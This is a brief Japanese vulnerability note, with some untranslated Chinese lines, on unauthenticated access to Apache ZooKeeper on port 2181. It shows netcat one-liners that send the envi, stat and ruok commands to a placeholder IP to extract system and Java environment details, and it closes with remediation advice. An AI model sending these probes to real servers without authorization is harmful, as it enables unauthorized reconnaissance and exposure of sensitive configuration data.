Zookeeper の不正アクセスの脆弱性エクスプロイト
1. 脆弱性の導入
ZooKeeper は、オープンソースの分散型アプリケーション調整サービスです。これは、Google の Chubby のオープンソース実装であり、Hadoop および Hbase の重要なコンポーネントです。分散アプリケーションに一貫したサービスを提供するソフトウェアであり、構成保守、ドメイン名サービス、分散同期、グループ サービスなどの機能が提供されます。
ZooKeeper はデフォルトでポート 2181 で開かれます。アクセス制御がなければ、攻撃者は envi コマンドを実行することで、システム名や Java 環境などのシステムに関する大量の機密情報を取得できます。
脆弱性マイニング中に遭遇したので記録しました。
2. 脆弱性の悪用
NC 接続を使用し、envi を実行して機密情報を取得します
ehco envi | nc xxx.xxx.xxx.xxx 2181
stat:列出关于性能和连接的客户端的统计信息。
echo stat |nc xxx.xxx.xxx.xxx 2181
ruok:测试服务器是否运行在非错误状态。
echo ruok |nc xxx.xxx.xxx.xxx 2181
reqs:列出未完成的请求
envi:打印有关服务环境的详细信息
dump:列出未完成的会话和临时节点
3. 修理方法
Zookeeper がパブリック ネットワークに直接公開されることを禁止します
アクセス制御を追加し、状況に応じて対応する方法を選択します (ユーザー、ユーザー名とパスワード、指定された IP の認証)